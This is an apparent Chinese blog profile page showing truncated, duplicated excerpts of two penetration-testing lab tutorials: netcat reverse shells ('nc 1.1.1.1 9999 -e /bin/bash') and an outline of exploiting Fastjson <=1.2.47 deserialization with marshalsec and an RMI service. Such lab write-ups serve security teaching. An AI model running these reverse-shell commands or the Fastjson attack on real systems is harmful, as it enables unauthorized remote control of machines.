简介
该用户还未填写简介
擅长的技术栈
可提供的服务
暂无可提供的服务
1、实验环境Kali:192.168.32.132//模拟靶机Windows:192.168.32.1//模拟公网vps2、若靶机上存在nc,获取反向shell:vps攻击机:nc -lvp 9999// 监听9999端口靶机:nc 1.1.1.1 9999 -e /bin/bash// Linux正向连接公网vps1.1.1.1的9999端口nc 1.1.1.1 9999 -e c:\windo
这里写自定义目录标题Fastjson<=1.2.47环境:1)Docker vulhub搭建环境2)jdk安装3)marshalsec与Exploit.java下载4)编译Exploit.java文件5)python开启web服务6)开启rmi服务7) nc开启端口监听8)漏洞探测9)反弹shellFastjson<=1.2.24Fastjson<=1.2.47环境:Centos
1、实验环境Kali:192.168.32.132//模拟靶机Windows:192.168.32.1//模拟公网vps2、若靶机上存在nc,获取反向shell:vps攻击机:nc -lvp 9999// 监听9999端口靶机:nc 1.1.1.1 9999 -e /bin/bash// Linux正向连接公网vps1.1.1.1的9999端口nc 1.1.1.1 9999 -e c:\windo
这里写自定义目录标题Fastjson<=1.2.47环境:1)Docker vulhub搭建环境2)jdk安装3)marshalsec与Exploit.java下载4)编译Exploit.java文件5)python开启web服务6)开启rmi服务7) nc开启端口监听8)漏洞探测9)反弹shellFastjson<=1.2.24Fastjson<=1.2.47环境:Centos